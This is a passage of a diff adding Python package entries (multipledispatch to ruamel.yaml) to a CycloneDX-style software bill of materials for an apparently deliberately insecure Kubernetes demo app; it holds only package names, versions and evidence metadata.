"pkg:pypi/multipledispatch@latest", + "type": "library", + "bom-ref": "pkg:pypi/multipledispatch@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "multiprocess", + "version": "latest", + "purl": "pkg:pypi/multiprocess@latest", + "type": "library", + "bom-ref": "pkg:pypi/multiprocess@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "munkres", + "version": "1.1.4", + "purl": "pkg:pypi/munkres@1.1.4", + "type": "library", + "bom-ref": "pkg:pypi/munkres@1.1.4", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "mypy-extensions", + "version": "latest", + "purl": "pkg:pypi/mypy-extensions@latest", + "type": "library", + "bom-ref": "pkg:pypi/mypy-extensions@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "navigator-updater", + "version": "latest", + "purl": "pkg:pypi/navigator-updater@latest", + "type": "library", + "bom-ref": "pkg:pypi/navigator-updater@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "nbclassic", + "version": "latest", + "purl": "pkg:pypi/nbclassic@latest", + "type": "library", + "bom-ref": "pkg:pypi/nbclassic@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "nbclient", + "version": "latest", + "purl": "pkg:pypi/nbclient@latest", + "type": "library", + "bom-ref": "pkg:pypi/nbclient@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "nbconvert", + "version": "latest", + "purl": "pkg:pypi/nbconvert@latest", + "type": "library", + "bom-ref": "pkg:pypi/nbconvert@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "nest-asyncio", + "version": "latest", + "purl": "pkg:pypi/nest-asyncio@latest", + "type": "library", + "bom-ref": "pkg:pypi/nest-asyncio@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "networkx", + "version": "latest", + "purl": "pkg:pypi/networkx@latest", + "type": "library", + "bom-ref": "pkg:pypi/networkx@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "nltk", + "version": "latest", + "purl": "pkg:pypi/nltk@latest", + "type": "library", + "bom-ref": "pkg:pypi/nltk@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "notebook", + "version": "latest", + "purl": "pkg:pypi/notebook@latest", + "type": "library", + "bom-ref": "pkg:pypi/notebook@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "notebook-shim", + "version": "latest", + "purl": "pkg:pypi/notebook-shim@latest", + "type": "library", + "bom-ref": "pkg:pypi/notebook-shim@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "numba", + "version": "latest", + "purl": "pkg:pypi/numba@latest", + "type": "library", + "bom-ref": "pkg:pypi/numba@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "numexpr", + "version": "latest", + "purl": "pkg:pypi/numexpr@latest", + "type": "library", + "bom-ref": "pkg:pypi/numexpr@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "numpydoc", + "version": "latest", + "purl": "pkg:pypi/numpydoc@latest", + "type": "framework", + "bom-ref": "pkg:pypi/numpydoc@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "openpyxl", + "version": "3.0.10", + "purl": "pkg:pypi/openpyxl@3.0.10", + "type": "library", + "bom-ref": "pkg:pypi/openpyxl@3.0.10", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pandas", + "version": "latest", + "purl": "pkg:pypi/pandas@latest", + "type": "framework", + "bom-ref": "pkg:pypi/pandas@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pandocfilters", + "version": "latest", + "purl": "pkg:pypi/pandocfilters@latest", + "type": "library", + "bom-ref": "pkg:pypi/pandocfilters@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "panel", + "version": "latest", + "purl": "pkg:pypi/panel@latest", + "type": "library", + "bom-ref": "pkg:pypi/panel@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "param", + "version": "latest", + "purl": "pkg:pypi/param@latest", + "type": "library", + "bom-ref": "pkg:pypi/param@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "parso", + "version": "latest", + "purl": "pkg:pypi/parso@latest", + "type": "library", + "bom-ref": "pkg:pypi/parso@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "partd", + "version": "latest", + "purl": "pkg:pypi/partd@latest", + "type": "library", + "bom-ref": "pkg:pypi/partd@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pathlib", + "version": "latest", + "purl": "pkg:pypi/pathlib@latest", + "type": "library", + "bom-ref": "pkg:pypi/pathlib@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pathspec", + "version": "latest", + "purl": "pkg:pypi/pathspec@latest", + "type": "library", + "bom-ref": "pkg:pypi/pathspec@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "patsy", + "version": "0.5.3", + "purl": "pkg:pypi/patsy@0.5.3", + "type": "library", + "bom-ref": "pkg:pypi/patsy@0.5.3", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pep8", + "version": "1.7.1", + "purl": "pkg:pypi/pep8@1.7.1", + "type": "library", + "bom-ref": "pkg:pypi/pep8@1.7.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pexpect", + "version": "latest", + "purl": "pkg:pypi/pexpect@latest", + "type": "library", + "bom-ref": "pkg:pypi/pexpect@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pickleshare", + "version": "latest", + "purl": "pkg:pypi/pickleshare@latest", + "type": "library", + "bom-ref": "pkg:pypi/pickleshare@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pkginfo", + "version": "latest", + "purl": "pkg:pypi/pkginfo@latest", + "type": "library", + "bom-ref": "pkg:pypi/pkginfo@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "platformdirs", + "version": "latest", + "purl": "pkg:pypi/platformdirs@latest", + "type": "library", + "bom-ref": "pkg:pypi/platformdirs@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "plotly", + "version": "latest", + "purl": "pkg:pypi/plotly@latest", + "type": "library", + "bom-ref": "pkg:pypi/plotly@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pluggy", + "version": "latest", + "purl": "pkg:pypi/pluggy@latest", + "type": "library", + "bom-ref": "pkg:pypi/pluggy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ply", + "version": "3.11", + "purl": "pkg:pypi/ply@3.11", + "type": "library", + "bom-ref": "pkg:pypi/ply@3.11", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "poyo", + "version": "latest", + "purl": "pkg:pypi/poyo@latest", + "type": "library", + "bom-ref": "pkg:pypi/poyo@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "prometheus-client", + "version": "latest", + "purl": "pkg:pypi/prometheus-client@latest", + "type": "library", + "bom-ref": "pkg:pypi/prometheus-client@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "prompt-toolkit", + "version": "latest", + "purl": "pkg:pypi/prompt-toolkit@latest", + "type": "library", + "bom-ref": "pkg:pypi/prompt-toolkit@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "psutil", + "version": "latest", + "purl": "pkg:pypi/psutil@latest", + "type": "library", + "bom-ref": "pkg:pypi/psutil@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ptyprocess", + "version": "latest", + "purl": "pkg:pypi/ptyprocess@latest", + "type": "library", + "bom-ref": "pkg:pypi/ptyprocess@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pure-eval", + "version": "latest", + "purl": "pkg:pypi/pure-eval@latest", + "type": "library", + "bom-ref": "pkg:pypi/pure-eval@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "py-cpuinfo", + "version": "latest", + "purl": "pkg:pypi/py-cpuinfo@latest", + "type": "library", + "bom-ref": "pkg:pypi/py-cpuinfo@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyarrow", + "version": "11.0.0", + "purl": "pkg:pypi/pyarrow@11.0.0", + "type": "library", + "bom-ref": "pkg:pypi/pyarrow@11.0.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyasn1", + "version": "latest", + "purl": "pkg:pypi/pyasn1@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyasn1@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pycodestyle", + "version": "latest", + "purl": "pkg:pypi/pycodestyle@latest", + "type": "library", + "bom-ref": "pkg:pypi/pycodestyle@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pycosat", + "version": "latest", + "purl": "pkg:pypi/pycosat@latest", + "type": "library", + "bom-ref": "pkg:pypi/pycosat@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pycparser", + "version": "latest", + "purl": "pkg:pypi/pycparser@latest", + "type": "library", + "bom-ref": "pkg:pypi/pycparser@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyct", + "version": "latest", + "purl": "pkg:pypi/pyct@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyct@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pycurl", + "version": "latest", + "purl": "pkg:pypi/pycurl@latest", + "type": "library", + "bom-ref": "pkg:pypi/pycurl@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pydocstyle", + "version": "latest", + "purl": "pkg:pypi/pydocstyle@latest", + "type": "library", + "bom-ref": "pkg:pypi/pydocstyle@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyerfa", + "version": "latest", + "purl": "pkg:pypi/pyerfa@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyerfa@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyflakes", + "version": "latest", + "purl": "pkg:pypi/pyflakes@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyflakes@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pylint", + "version": "latest", + "purl": "pkg:pypi/pylint@latest", + "type": "library", + "bom-ref": "pkg:pypi/pylint@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pylint-venv", + "version": "latest", + "purl": "pkg:pypi/pylint-venv@latest", + "type": "library", + "bom-ref": "pkg:pypi/pylint-venv@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyls-spyder", + "version": "0.4.0", + "purl": "pkg:pypi/pyls-spyder@0.4.0", + "type": "library", + "bom-ref": "pkg:pypi/pyls-spyder@0.4.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyodbc", + "version": "latest", + "purl": "pkg:pypi/pyodbc@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyodbc@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyparsing", + "version": "latest", + "purl": "pkg:pypi/pyparsing@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyparsing@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyrsistent", + "version": "latest", + "purl": "pkg:pypi/pyrsistent@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyrsistent@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pytest", + "version": "latest", + "purl": "pkg:pypi/pytest@latest", + "type": "library", + "bom-ref": "pkg:pypi/pytest@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "python-json-logger", + "version": "latest", + "purl": "pkg:pypi/python-json-logger@latest", + "type": "library", + "bom-ref": "pkg:pypi/python-json-logger@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "python-lsp-black", + "version": "latest", + "purl": "pkg:pypi/python-lsp-black@latest", + "type": "library", + "bom-ref": "pkg:pypi/python-lsp-black@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "python-lsp-jsonrpc", + "version": "1.0.0", + "purl": "pkg:pypi/python-lsp-jsonrpc@1.0.0", + "type": "library", + "bom-ref": "pkg:pypi/python-lsp-jsonrpc@1.0.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "python-lsp-server", + "version": "latest", + "purl": "pkg:pypi/python-lsp-server@latest", + "type": "library", + "bom-ref": "pkg:pypi/python-lsp-server@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "python-slugify", + "version": "latest", + "purl": "pkg:pypi/python-slugify@latest", + "type": "library", + "bom-ref": "pkg:pypi/python-slugify@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "python-snappy", + "version": "latest", + "purl": "pkg:pypi/python-snappy@latest", + "type": "library", + "bom-ref": "pkg:pypi/python-snappy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pytoolconfig", + "version": "latest", + "purl": "pkg:pypi/pytoolconfig@latest", + "type": "library", + "bom-ref": "pkg:pypi/pytoolconfig@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyviz-comms", + "version": "latest", + "purl": "pkg:pypi/pyviz-comms@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyviz-comms@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyxdg", + "version": "latest", + "purl": "pkg:pypi/pyxdg@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyxdg@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyzmq", + "version": "latest", + "purl": "pkg:pypi/pyzmq@latest", + "type": "library", + "bom-ref": "pkg:pypi/pyzmq@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "qstylizer", + "version": "latest", + "purl": "pkg:pypi/qstylizer@latest", + "type": "library", + "bom-ref": "pkg:pypi/qstylizer@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "qtconsole", + "version": "latest", + "purl": "pkg:pypi/qtconsole@latest", + "type": "library", + "bom-ref": "pkg:pypi/qtconsole@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "regex", + "version": "latest", + "purl": "pkg:pypi/regex@latest", + "type": "library", + "bom-ref": "pkg:pypi/regex@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "requests-file", + "version": "latest", + "purl": "pkg:pypi/requests-file@latest", + "type": "library", + "bom-ref": "pkg:pypi/requests-file@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "requests-toolbelt", + "version": "latest", + "purl": "pkg:pypi/requests-toolbelt@latest", + "type": "library", + "bom-ref": "pkg:pypi/requests-toolbelt@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "responses", + "version": "latest", + "purl": "pkg:pypi/responses@latest", + "type": "library", + "bom-ref": "pkg:pypi/responses@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "rfc3339-validator", + "version": "latest", + "purl": "pkg:pypi/rfc3339-validator@latest", + "type": "library", + "bom-ref": "pkg:pypi/rfc3339-validator@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "rfc3986-validator", + "version": "latest", + "purl": "pkg:pypi/rfc3986-validator@latest", + "type": "library", + "bom-ref": "pkg:pypi/rfc3986-validator@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "rope", + "version": "latest", + "purl": "pkg:pypi/rope@latest", + "type": "library", + "bom-ref": "pkg:pypi/rope@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ruamel.yaml", + "version": "latest", + "purl": "pkg:pypi/ruamel.yaml@latest", + "type": "library", + "bom-ref": 